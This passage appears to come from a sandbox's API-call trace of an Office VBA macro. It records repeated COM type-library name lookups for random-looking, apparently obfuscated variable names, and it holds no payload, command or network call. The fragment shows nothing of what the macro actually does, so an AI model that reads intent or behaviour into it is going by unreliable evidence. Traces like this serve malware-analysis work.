ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.486] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.486] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3ba28ee | out: _Dst=0x67c2d40) returned 0x0 [0068.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zoA1AZ") returned 0x10ada9 [0068.486] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_zoA1AZ" | out: _Dst="_B_var_zoA1AZ") returned 0x0 [0068.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_zoA1AZ") returned 14 [0068.486] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.486] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zoA1AZ", lHashVal=0x10ada9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.486] IUnknown:Release (This=0x665ba50) returned 0xb [0068.486] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.486] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zoA1AZ", lHashVal=0x10ada9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.486] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.486] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.486] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zoA1AZ", lHashVal=0x10ada9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.486] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.486] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.486] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zoA1AZ", lHashVal=0x10ada9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.486] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.486] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.486] IUnknown:Release (This=0x665ba50) returned 0xb [0068.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1d5a, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_zoA1AZ") returned 14 [0068.487] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zoA1AZ", lHashVal=0x10ada9, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0) returned 0x0 [0068.487] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba28ee | out: _Dst=0x145020) returned 0x0 [0068.487] ITypeComp:RemoteBind (in: This=0x665ba60, szName="oZ_AAkD", lHashVal=0x1042cf, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2942, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="oZ_AAkD") returned 8 [0068.487] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="oZ_AAkD", lHashVal=0x1042cf, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2942, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="oZ_AAkD") returned 8 [0068.487] ITypeComp:RemoteBind (in: This=0x665bd30, szName="oZ_AAkD", lHashVal=0x1042cf, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.487] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oZ_AAkD") returned 0x1042cf [0068.487] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="oZ_AAkD" | out: _Dst="oZ_AAkD") returned 0x0 [0068.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="oZ_AAkD") returned 8 [0068.487] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.487] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="oZ_AAkD", lHashVal=0x1042cf, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.487] IUnknown:Release (This=0x665ba50) returned 0xb [0068.487] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.488] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="oZ_AAkD", lHashVal=0x1042cf, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.488] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.488] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.488] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="oZ_AAkD", lHashVal=0x1042cf, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.488] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.488] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.488] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="oZ_AAkD", lHashVal=0x1042cf, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.488] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2942, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="oZ_AAkD") returned 8 [0068.488] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="oZ_AAkD", lHashVal=0x1042cf, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.488] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.488] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba2942 | out: _Dst=0x67c2d40) returned 0x0 [0068.488] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_oZ_AAkD") returned 0x104653 [0068.488] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_oZ_AAkD" | out: _Dst="_B_var_oZ_AAkD") returned 0x0 [0068.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_oZ_AAkD") returned 15 [0068.488] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.488] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_oZ_AAkD", lHashVal=0x104653, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.488] IUnknown:Release (This=0x665ba50) returned 0xb [0068.488] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.488] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_oZ_AAkD", lHashVal=0x104653, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.488] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.488] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.488] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_oZ_AAkD", lHashVal=0x104653, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.488] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.488] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.488] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_oZ_AAkD", lHashVal=0x104653, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.489] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.489] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.489] IUnknown:Release (This=0x665ba50) returned 0xb [0068.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1d8a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_oZ_AAkD") returned 15 [0068.489] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_oZ_AAkD", lHashVal=0x104653, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x6f005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x6f005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.489] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2942 | out: _Dst=0x145020) returned 0x0 [0068.489] ITypeComp:RemoteBind (in: This=0x665ba60, szName="hBcQDcCX", lHashVal=0x10696b, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2916, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="hBcQDcCX") returned 9 [0068.489] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="hBcQDcCX", lHashVal=0x10696b, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2916, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="hBcQDcCX") returned 9 [0068.489] ITypeComp:RemoteBind (in: This=0x665bd30, szName="hBcQDcCX", lHashVal=0x10696b, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hBcQDcCX") returned 0x10696b [0068.489] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="hBcQDcCX" | out: _Dst="hBcQDcCX") returned 0x0 [0068.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="hBcQDcCX") returned 9 [0068.489] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.489] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="hBcQDcCX", lHashVal=0x10696b, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.489] IUnknown:Release (This=0x665ba50) returned 0xb [0068.489] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.489] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="hBcQDcCX", lHashVal=0x10696b, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.489] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.489] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.489] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="hBcQDcCX", lHashVal=0x10696b, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.489] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.489] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.490] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="hBcQDcCX", lHashVal=0x10696b, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.490] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2916, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="hBcQDcCX") returned 9 [0068.490] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="hBcQDcCX", lHashVal=0x10696b, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.490] IMalloc:Realloc (This=0x7fefec05380, pv=0x6288170, cb=0x4000) returned 0xaf1b5b0 [0068.490] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.490] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3ba2916 | out: _Dst=0x67c2d40) returned 0x0 [0068.490] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_hBcQDcCX") returned 0x1040f4 [0068.490] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="pQAGCcZ", cchCount1=-1, lpString2="_B_var_hBcQDcCX", cchCount2=-1) returned 3 [0068.490] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_hBcQDcCX" | out: _Dst="_B_var_hBcQDcCX") returned 0x0 [0068.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_hBcQDcCX") returned 16 [0068.490] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.490] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_hBcQDcCX", lHashVal=0x1040f4, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.490] IUnknown:Release (This=0x665ba50) returned 0xb [0068.490] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.490] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_hBcQDcCX", lHashVal=0x1040f4, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.490] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.490] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.490] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_hBcQDcCX", lHashVal=0x1040f4, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.490] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.490] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.490] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_hBcQDcCX", lHashVal=0x1040f4, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.490] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.490] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.490] IUnknown:Release (This=0x665ba50) returned 0xb [0068.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1dba, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_hBcQDcCX") returned 16 [0068.491] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_hBcQDcCX", lHashVal=0x1040f4, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x68005f00720061, ppTypeComp=0x44005100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x68005f00720061, ppTypeComp=0x44005100000000, pDummy=0x0) returned 0x0 [0068.491] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2916 | out: _Dst=0x145020) returned 0x0 [0068.491] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cDAAxAQ", lHashVal=0x10c264, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2992, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="cDAAxAQ") returned 8 [0068.491] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cDAAxAQ", lHashVal=0x10c264, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2992, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="cDAAxAQ") returned 8 [0068.491] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cDAAxAQ", lHashVal=0x10c264, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cDAAxAQ") returned 0x10c264 [0068.491] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="cDAAxAQ" | out: _Dst="cDAAxAQ") returned 0x0 [0068.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="cDAAxAQ") returned 8 [0068.491] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.491] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="cDAAxAQ", lHashVal=0x10c264, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.491] IUnknown:Release (This=0x665ba50) returned 0xb [0068.491] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.491] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="cDAAxAQ", lHashVal=0x10c264, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.491] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.491] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.491] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="cDAAxAQ", lHashVal=0x10c264, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.491] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.491] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.492] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="cDAAxAQ", lHashVal=0x10c264, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.492] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2992, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="cDAAxAQ") returned 8 [0068.492] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cDAAxAQ", lHashVal=0x10c264, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.492] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.492] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba2992 | out: _Dst=0x67c2d40) returned 0x0 [0068.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cDAAxAQ") returned 0x10c5e8 [0068.492] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_cDAAxAQ" | out: _Dst="_B_var_cDAAxAQ") returned 0x0 [0068.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_cDAAxAQ") returned 15 [0068.492] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.492] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_cDAAxAQ", lHashVal=0x10c5e8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.492] IUnknown:Release (This=0x665ba50) returned 0xb [0068.492] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.492] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_cDAAxAQ", lHashVal=0x10c5e8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.492] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.492] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.492] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_cDAAxAQ", lHashVal=0x10c5e8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.492] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.492] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.492] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_cDAAxAQ", lHashVal=0x10c5e8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.492] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.492] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.492] IUnknown:Release (This=0x665ba50) returned 0xb [0068.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1dea, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_cDAAxAQ") returned 15 [0068.492] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cDAAxAQ", lHashVal=0x10c5e8, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x63005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x63005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0) returned 0x0 [0068.492] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2992 | out: _Dst=0x145020) returned 0x0 [0068.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba29ba, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="D_DBZDA") returned 8 [0068.493] ITypeComp:RemoteBind (in: This=0x665ba60, szName="D_DBZDA", lHashVal=0x10e580, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba29ba, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="D_DBZDA") returned 8 [0068.493] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="D_DBZDA", lHashVal=0x10e580, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba29ba, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="D_DBZDA") returned 8 [0068.493] ITypeComp:RemoteBind (in: This=0x665bd30, szName="D_DBZDA", lHashVal=0x10e580, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D_DBZDA") returned 0x10e580 [0068.493] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="D_DBZDA" | out: _Dst="D_DBZDA") returned 0x0 